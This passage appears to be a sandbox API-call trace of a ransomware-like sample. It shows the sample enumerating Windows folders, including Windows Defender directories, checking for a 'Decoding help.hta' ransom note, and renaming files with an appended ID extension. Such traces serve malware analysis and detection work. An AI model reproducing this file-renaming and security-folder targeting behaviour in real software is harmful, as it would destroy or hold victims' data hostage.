ftLastAccessTime.dwLowDateTime=0x8239fda1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x281a7b81, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext.png", cAlternateFileName="")) returned 1 [0061.302] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0061.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0061.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0061.302] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext.png") returned 1 [0061.302] lstrlenW (lpString="bNext.png") returned 9 [0061.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.302] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0061.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" [0061.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" [0061.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.303] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824845cf, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824845cf, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-disable.png", cAlternateFileName="")) returned 1 [0061.303] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0061.303] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0061.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0061.303] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bPrev-disable.png") returned 1 [0061.303] lstrlenW (lpString="bPrev-disable.png") returned 17 [0061.303] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 71 [0061.303] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bPrev-disable.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" [0061.303] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" [0061.303] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.985] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x26a9fd30 | out: lpFindFileData=0x26a9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239fda1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8239fda1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28219f9b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x199, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-down.png", cAlternateFileName="")) returned 1 Thread: id = 833 os_tid = 0x930 [0054.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*", lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671970 [0054.566] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.566] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.566] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.566] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.566] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc0a7e0, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0054.566] lstrcmpW (lpString1=".", lpString2="CacheManager") returned -1 [0054.566] lstrcmpW (lpString1="..", lpString2="CacheManager") returned -1 [0054.566] lstrcmpiW (lpString1="windows", lpString2="CacheManager") returned 1 [0054.569] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.569] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 63 [0054.569] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="CacheManager" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0054.569] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*" [0054.569] GlobalMemoryStatus (in: lpBuffer=0x26bdfd10 | out: lpBuffer=0x26bdfd10) [0054.569] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7c0488, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x818 [0054.574] CloseHandle (hObject=0x818) returned 1 [0054.574] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Results", cAlternateFileName="")) returned 1 [0054.574] lstrcmpW (lpString1=".", lpString2="Results") returned -1 [0054.574] lstrcmpW (lpString1="..", lpString2="Results") returned -1 [0054.575] lstrcmpiW (lpString1="windows", lpString2="Results") returned 1 [0054.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.578] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 63 [0054.578] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Results" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0054.578] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*" [0054.578] GlobalMemoryStatus (in: lpBuffer=0x26bdfd10 | out: lpBuffer=0x26bdfd10) [0054.578] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7f0558, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x818 [0054.580] CloseHandle (hObject=0x818) returned 1 [0054.580] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0xb9820270, ftLastWriteTime.dwHighDateTime=0x1d2faf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Service", cAlternateFileName="")) returned 1 [0054.580] lstrcmpW (lpString1=".", lpString2="Service") returned -1 [0054.580] lstrcmpW (lpString1="..", lpString2="Service") returned -1 [0054.580] lstrcmpiW (lpString1="windows", lpString2="Service") returned 1 [0054.580] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.580] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 63 [0054.580] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Service" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0054.580] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*" [0054.580] GlobalMemoryStatus (in: lpBuffer=0x26bdfd10 | out: lpBuffer=0x26bdfd10) [0054.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f60fb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x818 [0054.582] CloseHandle (hObject=0x818) returned 1 [0054.582] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 1 [0054.582] lstrcmpW (lpString1=".", lpString2="Store") returned -1 [0054.582] lstrcmpW (lpString1="..", lpString2="Store") returned -1 [0054.582] lstrcmpiW (lpString1="windows", lpString2="Store") returned 1 [0054.584] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.584] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 63 [0054.584] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Store" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0054.584] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*" [0054.584] GlobalMemoryStatus (in: lpBuffer=0x26bdfd10 | out: lpBuffer=0x26bdfd10) [0054.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a8085c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x818 [0054.587] CloseHandle (hObject=0x818) returned 1 [0054.587] FindNextFileW (in: hFindFile=0x671970, lpFindFileData=0x26bdfd30 | out: lpFindFileData=0x26bdfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 0 [0054.587] FindClose (in: hFindFile=0x671970 | out: hFindFile=0x671970) returned 1 Thread: id = 834 os_tid = 0x934 [0054.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*", lpFindFileData=0x26d1fd30 | out: lpFindFileData=0x26d1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b30 [0055.679] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.680] FindNextFileW (in: hFindFile=0x671b30, lpFindFileData=0x26d1fd30 | out: lpFindFileData=0x26d1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.680] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.680] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.680] FindNextFileW (in: hFindFile=0x671b30, lpFindFileData=0x26d1fd30 | out: lpFindFileData=0x26d1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.680] FindClose (in: hFindFile=0x671b30 | out: hFindFile=0x671b30) returned 1 Thread: id = 835 os_tid = 0x33c [0054.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*", lpFindFileData=0x26e5fd30 | out: lpFindFileData=0x26e5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b30 [0055.680] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.680] FindNextFileW (in: hFindFile=0x671b30, lpFindFileData=0x26e5fd30 | out: lpFindFileData=0x26e5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.681] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.681] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.681] FindNextFileW (in: hFindFile=0x671b30, lpFindFileData=0x26e5fd30 | out: lpFindFileData=0x26e5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.681] FindClose (in: hFindFile=0x671b30 | out: hFindFile=0x671b30) returned 1 Thread: id = 836 os_tid = 0x3ac [0054.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*", lpFindFileData=0x26f9fd30 | out: lpFindFileData=0x26f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b30 [0055.681] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.681] FindNextFileW (in: hFindFile=0x671b30, lpFindFileData=0x26f9fd30 | out: lpFindFileData=0x26f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.681] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.681] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.681] FindNextFileW (in: hFindFile=0x671b30, lpFindFileData=0x26f9fd30 | out: lpFindFileData=0x26f9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fd91f9, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fd91f9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x12c4d000, ftLastWriteTime.dwHighDateTime=0x1cb85c9, nFileSizeHigh=0x0, nFileSizeLow=0xb17190, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpasbase.vdm", cAlternateFileName="")) returned 1 [0055.850] lstrcpyW (in: lpString1=0x2aa30e28, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*" [0055.850] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*") returned 111 [0055.850] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta" [0055.850] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\decoding help.hta")) returned 0xffffffff [0055.850] CreateFileW 